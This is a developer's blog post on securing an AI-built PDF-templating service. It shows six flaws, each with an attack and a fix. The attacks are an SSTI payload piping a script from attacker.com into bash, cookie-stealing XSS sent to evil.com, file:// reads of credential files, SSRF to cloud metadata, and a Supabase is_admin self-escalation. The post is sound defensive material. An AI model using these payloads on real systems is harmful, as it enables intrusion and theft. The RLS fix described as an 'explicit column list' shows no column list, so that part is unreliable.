DEV Community: Vincent Ventalon The latest articles on DEV Community by Vincent Ventalon (@vincentventalon). https://dev.to/vincentventalon https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3762905%2Ff25a1878-0ece-4f85-9cfe-648b543247b2.jpeg DEV Community: Vincent Ventalon https://dev.to/vincentventalon en I Let Users Write HTML Templates - Here Are 6 Security Holes I Had to Patch Vincent Ventalon Fri, 20 Feb 2026 20:01:08 +0000 https://dev.to/vincentventalon/i-let-users-write-html-templates-here-are-6-security-holes-i-had-to-patch-lfi https://dev.to/vincentventalon/i-let-users-write-html-templates-here-are-6-security-holes-i-had-to-patch-lfi <p>Four months ago, I set myself a challenge: launch a SaaS that solves a pain point from my previous job: <a href="https://pdftemplateapi.com" rel="noopener noreferrer">API PDF generation from templates</a>.</p> <p>In 2026, you don't build alone. Claude wrote most of the code. I understand how it all works conceptually, but I couldn't tell you every implementation detail.</p> <p>One week before launch, I blocked the week to stress-test the whole codebase for security.</p> <p>Spoiler: out of the box, Claude Code hadn't applied a single security prevention.</p> <p>To be honest, it wasn't in my CLAUDE.md, and that was intentional. I was building a WYSIWYG editor with HTML templating, and I didn't want the model second-guessing every line with sanitization that would break the core feature. So I never asked for it.</p> <p>Armed with Claude and a friend who works in cybersecurity, we went hunting. Claude caught most of the obvious holes I'll describe below. But for vulnerabilities 3 and 6, we had to feed it the attack path before it understood the problem.</p> <p>Here's what we found.</p> <h2> The Stack </h2> <ul> <li> <strong>Frontend/CRUD</strong>: Next.js</li> <li> <strong>PDF API</strong>: FastAPI (Python)</li> <li> <strong>Template engine</strong>: Jinja2</li> <li> <strong>HTML to PDF</strong>: WeasyPrint</li> <li> <strong>Database/Auth</strong>: Supabase (PostgreSQL + Row Level Security)</li> <li> <strong>Hosting</strong>: Vercel + Google Cloud Run</li> </ul> <p>The core feature: users create HTML/CSS templates with <code>{{variables}}</code>, then call an API with JSON data to generate PDFs.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Simplified flow </span><span class="n">html</span> <span class="o">=</span> <span class="n">user_template</span> <span class="c1"># "Hello {{name}}!" </span><span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Alice</span><span class="sh">"</span><span class="p">}</span> <span class="n">rendered</span> <span class="o">=</span> <span class="n">jinja2</span><span class="p">.</span><span class="nf">render</span><span class="p">(</span><span class="n">html</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> <span class="c1"># "Hello Alice!" </span><span class="n">pdf</span> <span class="o">=</span> <span class="n">weasyprint</span><span class="p">.</span><span class="nc">HTML</span><span class="p">(</span><span class="n">rendered</span><span class="p">).</span><span class="nf">write_pdf</span><span class="p">()</span> </code></pre> </div> <p>What could go wrong?</p> <h2> Vulnerability 1: Server-Side Template Injection (SSTI) </h2> <p><strong>Severity: Critical</strong></p> <p>Jinja2's default <code>Environment</code> class lets you execute code directly.</p> <h3> The Attack </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{{ ''.__class__.__mro__[2].__subclasses__() }} </code></pre> </div> <p>This Python expression:</p> <ol> <li>Gets the empty string's class (<code>str</code>)</li> <li>Walks up the inheritance tree to <code>object</code> </li> <li>Lists all subclasses of <code>object</code> </li> </ol> <p>From there, an attacker can find dangerous classes like <code>subprocess.Popen</code> and achieve Remote Code Execution:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{{ ''.__class__.__mro__[2].__subclasses__()[40]('/bin/bash -c "curl attacker.com/shell.sh | bash"', shell=True) }} </code></pre> </div> <h3> The Fix </h3> <p>Jinja2 has a <code>SandboxedEnvironment</code> that blocks access to dangerous attributes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">jinja2.sandbox</span> <span class="kn">import</span> <span class="n">SandboxedEnvironment</span> <span class="k">class</span> <span class="nc">JinjaTemplateEngine</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="c1"># SandboxedEnvironment prevents SSTI attacks </span> <span class="n">self</span><span class="p">.</span><span class="n">env</span> <span class="o">=</span> <span class="nc">SandboxedEnvironment</span><span class="p">(</span> <span class="n">loader</span><span class="o">=</span><span class="nc">BaseLoader</span><span class="p">(),</span> <span class="n">autoescape</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">render</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">html</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">data</span><span class="p">:</span> <span class="nb">dict</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="n">template</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">env</span><span class="p">.</span><span class="nf">from_string</span><span class="p">(</span><span class="n">html</span><span class="p">)</span> <span class="k">return</span> <span class="n">template</span><span class="p">.</span><span class="nf">render</span><span class="p">(</span><span class="o">**</span><span class="n">data</span><span class="p">)</span> </code></pre> </div> <p>The sandbox blocks access to <code>__class__</code>, <code>__mro__</code>, <code>__subclasses__()</code>, and other dangerous attributes.</p> <h2> Vulnerability 2: XSS in Templates </h2> <p><strong>Severity: High</strong></p> <p>Users write HTML templates. That HTML gets rendered in the browser when they preview it in the editor.</p> <h3> The Attack </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;svg&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://evil.com/steal?c=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="nt">&lt;/script&gt;&lt;/svg&gt;</span> </code></pre> </div> <p>A malicious user creates a template with embedded JavaScript. When another user opens that template in the editor, the script runs and steals their session. Not a big deal since I don't allow template sharing, but risky if for example I load a customer's template during support.</p> <h3> The Fix </h3> <p>Sanitize HTML before storing or rendering:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">nh3</span> <span class="k">def</span> <span class="nf">sanitize_html</span><span class="p">(</span><span class="n">html</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="k">return</span> <span class="n">nh3</span><span class="p">.</span><span class="nf">clean</span><span class="p">(</span> <span class="n">html</span><span class="p">,</span> <span class="n">tags</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">div</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">span</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">p</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">h1</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">h2</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">h3</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">table</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">tr</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">td</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">th</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">img</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">style</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">header</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">footer</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">section</span><span class="sh">"</span><span class="p">},</span> <span class="n">attributes</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">:</span> <span class="p">{</span><span class="sh">"</span><span class="s">class</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">style</span><span class="sh">"</span><span class="p">},</span> <span class="sh">"</span><span class="s">img</span><span class="sh">"</span><span class="p">:</span> <span class="p">{</span><span class="sh">"</span><span class="s">src</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">alt</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">width</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">height</span><span class="sh">"</span><span class="p">},</span> <span class="p">},</span> <span class="p">)</span> </code></pre> </div> <p>The <code>nh3</code> library (Rust-based, fast) strips all <code>&lt;script&gt;</code> tags, event handlers like <code>onclick</code>, and other XSS vectors while keeping the HTML structure intact.</p> <h2> Vulnerability 3: Local File Inclusion (LFI) </h2> <p>This one is interesting. Claude couldn't find it, and only fixed it partially. Let me explain.</p> <p><strong>Severity: Critical</strong></p> <p>WeasyPrint processes HTML like a browser - including fetching resources. By default, it allows the <code>file://</code> protocol.</p> <h3> The Attack </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">"attachment"</span> <span class="na">href=</span><span class="s">"file:///etc/passwd"</span><span class="nt">&gt;</span> </code></pre> </div> <p>Open the resulting PDF in Firefox, and <code>/etc/passwd</code> is embedded as an attachment. Same works for:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"file:///app/backend/.env"</span><span class="nt">&gt;</span> <span class="nt">&lt;link</span> <span class="na">href=</span><span class="s">"file:///proc/self/environ"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">&gt;</span> </code></pre> </div> <p>An attacker could read environment variables (API keys, database credentials), source code, any file the server process can access.</p> <h3> The Fix </h3> <p>Custom URL fetcher that blocks <code>file://</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">weasyprint</span> <span class="kn">import</span> <span class="n">default_url_fetcher</span> <span class="k">def</span> <span class="nf">secure_url_fetcher</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">timeout</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="mi">10</span><span class="p">,</span> <span class="n">ssl_context</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="n">scheme</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">.</span><span class="n">scheme</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="c1"># Block file:// protocol </span> <span class="k">if</span> <span class="n">scheme</span> <span class="o">==</span> <span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">URLFetcherSecurityError</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Access to local files is not allowed: </span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="c1"># Allow data: URLs (inline images) </span> <span class="k">if</span> <span class="n">scheme</span> <span class="o">==</span> <span class="sh">'</span><span class="s">data</span><span class="sh">'</span><span class="p">:</span> <span class="k">return</span> <span class="nf">default_url_fetcher</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="n">timeout</span><span class="p">,</span> <span class="n">ssl_context</span><span class="o">=</span><span class="n">ssl_context</span><span class="p">)</span> <span class="c1"># Only allow http/https </span> <span class="k">if</span> <span class="n">scheme</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">(</span><span class="sh">'</span><span class="s">http</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">https</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">URLFetcherSecurityError</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">URL scheme </span><span class="sh">'</span><span class="si">{</span><span class="n">scheme</span><span class="si">}</span><span class="sh">'</span><span class="s"> is not allowed</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">default_url_fetcher</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="n">timeout</span><span class="p">,</span> <span class="n">ssl_context</span><span class="o">=</span><span class="n">ssl_context</span><span class="p">)</span> <span class="c1"># Apply to all WeasyPrint calls </span><span class="nc">HTML</span><span class="p">(</span><span class="n">string</span><span class="o">=</span><span class="n">html</span><span class="p">,</span> <span class="n">url_fetcher</span><span class="o">=</span><span class="n">secure_url_fetcher</span><span class="p">)</span> </code></pre> </div> <p>Claude sanitized templates before saving to the database. Good.</p> <p>But guess what? Templates aren't the only attack vector. This one is tricky, and Claude couldn't find it at all.</p> <p>We also have a preview endpoint. It doesn't generate a PDF, just previews the template as HTML. The endpoint is only for authenticated users, but here's the catch: if you use developer tools to grab your JWT token and reuse it in a script, you can send custom HTML directly to the endpoint.</p> <h2> Vulnerability 4: SSRF to Internal IPs </h2> <p><strong>Severity: High</strong></p> <p>Blocking <code>file://</code> isn't enough. HTML can reference external images and stylesheets. On cloud platforms, that's a problem.</p> <h3> The Attack </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"http://169.254.169.254/latest/meta-data/iam/security-credentials/"</span><span class="nt">&gt;</span> </code></pre> </div> <p>That IP is the cloud metadata endpoint. On GCP, AWS, and Azure, it returns instance credentials, service account tokens, and other secrets.</p> <p>Also dangerous:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"http://10.0.0.1/admin"</span><span class="nt">&gt;</span> <span class="c">&lt;!-- Internal services --&gt;</span> <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"http://localhost:6379/"</span><span class="nt">&gt;</span> <span class="c">&lt;!-- Redis? --&gt;</span> </code></pre> </div> <h3> The Fix </h3> <p>Block all private IP ranges. We used a library for this.</p> <h2> Vulnerability 5: DNS Rebinding (SSRF Bypass) </h2> <p>Not sure this one is a real-world threat, but Claude flagged it, so we fixed it anyway.</p> <p><strong>Severity: Medium</strong></p> <p>The SSRF fix checks if the hostname <em>is</em> a private IP. But what if the hostname <em>resolves</em> to a private IP?</p> <h3> The Attack </h3> <ol> <li>Attacker owns <code>evil.com</code> </li> <li>Configures DNS with a short TTL: <ul> <li>First query: <code>evil.com</code> → <code>203.0.113.50</code> (public IP, passes validation)</li> <li>After TTL expires: <code>evil.com</code> → <code>169.254.169.254</code> (metadata!)</li> </ul> </li> <li>Sends HTML: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code> <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"http://evil.com/image.png"</span><span class="nt">&gt;</span> </code></pre> </div> <ol> <li>Our validation checks "evil.com" - not a blocked hostname, not an IP - passes</li> <li>WeasyPrint resolves DNS again (rebind happened) → fetches <code>http://169.254.169.254/</code> </li> </ol> <h3> The Fix </h3> <p>Resolve the hostname and validate the actual IP before fetching:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">socket</span> <span class="k">def</span> <span class="nf">_resolve_hostname</span><span class="p">(</span><span class="n">hostname</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">list</span><span class="p">[</span><span class="nb">str</span><span class="p">]:</span> <span class="k">try</span><span class="p">:</span> <span class="n">results</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">getaddrinfo</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">AF_UNSPEC</span><span class="p">)</span> <span class="k">return</span> <span class="nf">list</span><span class="p">(</span><span class="nf">set</span><span class="p">(</span><span class="n">r</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">results</span><span class="p">))</span> <span class="k">except</span> <span class="n">socket</span><span class="p">.</span><span class="n">gaierror</span><span class="p">:</span> <span class="k">return</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">secure_url_fetcher</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">timeout</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="mi">10</span><span class="p">,</span> <span class="n">ssl_context</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="c1"># ... existing checks ... </span> <span class="c1"># Resolve hostname and validate ALL resulting IPs </span> <span class="n">resolved_ips</span> <span class="o">=</span> <span class="nf">_resolve_hostname</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">resolved_ips</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">URLFetcherSecurityError</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Could not resolve hostname: </span><span class="si">{</span><span class="n">hostname</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">for</span> <span class="n">ip_str</span> <span class="ow">in</span> <span class="n">resolved_ips</span><span class="p">:</span> <span class="k">if</span> <span class="nf">_is_private_ip</span><span class="p">(</span><span class="n">ip_str</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">URLFetcherSecurityError</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Hostname </span><span class="sh">'</span><span class="si">{</span><span class="n">hostname</span><span class="si">}</span><span class="sh">'</span><span class="s"> resolves to a private IP address</span><span class="sh">"</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">default_url_fetcher</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="n">timeout</span><span class="p">,</span> <span class="n">ssl_context</span><span class="o">=</span><span class="n">ssl_context</span><span class="p">)</span> </code></pre> </div> <h2> Vulnerability 6: Supabase RLS Bypass </h2> <p>Claude couldn't find this one either - at least not in defense mode. But it found it instantly in attack mode. We ran Claude in two scenarios: "look at this code and tell me what's wrong" vs "here's a Supabase app, try to hack it." Night and day.</p> <p><strong>Severity: Critical</strong></p> <p>Supabase uses Row Level Security to restrict data access. My policies looked fine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="n">POLICY</span> <span class="nv">"Users can view own templates"</span> <span class="k">ON</span> <span class="n">templates</span> <span class="k">FOR</span> <span class="k">SELECT</span> <span class="k">USING</span> <span class="p">(</span><span class="n">auth</span><span class="p">.</span><span class="n">uid</span><span class="p">()</span> <span class="o">=</span> <span class="n">user_id</span><span class="p">);</span> </code></pre> </div> <p>Users can only see their own templates. Great.</p> <h3> The Attack </h3> <p>The <code>profiles</code> table had an <code>is_admin</code> column. The RLS policy for admin endpoints checked this column:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="n">POLICY</span> <span class="nv">"Admins can view all templates"</span> <span class="k">ON</span> <span class="n">templates</span> <span class="k">FOR</span> <span class="k">SELECT</span> <span class="k">USING</span> <span class="p">(</span> <span class="k">EXISTS</span> <span class="p">(</span> <span class="k">SELECT</span> <span class="mi">1</span> <span class="k">FROM</span> <span class="n">profiles</span> <span class="k">WHERE</span> <span class="n">profiles</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">auth</span><span class="p">.</span><span class="n">uid</span><span class="p">()</span> <span class="k">AND</span> <span class="n">profiles</span><span class="p">.</span><span class="n">is_admin</span> <span class="o">=</span> <span class="k">true</span> <span class="p">)</span> <span class="p">);</span> </code></pre> </div> <p>The problem: users could update their own profile. Including <code>is_admin</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Any authenticated user could do this</span> <span class="k">await</span> <span class="nx">supabase</span> <span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="dl">'</span><span class="s1">profiles</span><span class="dl">'</span><span class="p">)</span> <span class="p">.</span><span class="nf">update</span><span class="p">({</span> <span class="na">is_admin</span><span class="p">:</span> <span class="kc">true</span> <span class="p">})</span> <span class="p">.</span><span class="nf">eq</span><span class="p">(</span><span class="dl">'</span><span class="s1">id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">myUserId</span><span class="p">)</span> </code></pre> </div> <p>Instant admin access.</p> <h3> The Fix </h3> <p>Column-level security - Remove <code>is_admin</code> from the client-updatable columns:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="c1">-- Profiles update policy: explicit column list</span> <span class="k">CREATE</span> <span class="n">POLICY</span> <span class="nv">"Users can update own profile"</span> <span class="k">ON</span> <span class="n">profiles</span> <span class="k">FOR</span> <span class="k">UPDATE</span> <span class="k">USING</span> <span class="p">(</span><span class="n">auth</span><span class="p">.</span><span class="n">uid</span><span class="p">()</span> <span class="o">=</span> <span class="n">id</span><span class="p">)</span> <span class="k">WITH</span> <span class="k">CHECK</span> <span class="p">(</span><span class="n">auth</span><span class="p">.</span><span class="n">uid</span><span class="p">()</span> <span class="o">=</span> <span class="n">id</span><span class="p">);</span> <span class="c1">-- Then use a security definer function for admin checks</span> <span class="c1">-- that reads from a separate, locked-down table</span> </code></pre> </div> <h2> What I learned </h2> <p>The biggest lesson wasn't about any specific vulnerability. LLMs are blind to attack paths when they're reviewing code. Ask Claude "what's wrong with this?" and it checks for patterns it knows are bad. Some vulnerabilities hide in plain sight though - they're not in any single file, they're in how pieces interact.</p> <p>Put the same LLM in attack mode - "here's the app, break it" - and suddenly it thinks like an attacker. It chains things together. It asks "what if I do this, then this?" That's when it found the RLS bypass in seconds.</p> <p>If you're using AI for security reviews, don't just ask it to check your code. Give it a target and tell it to hack it.</p> <p>Hope this helps some fellow builders.</p> <p>Vince</p> security learning cybersecurity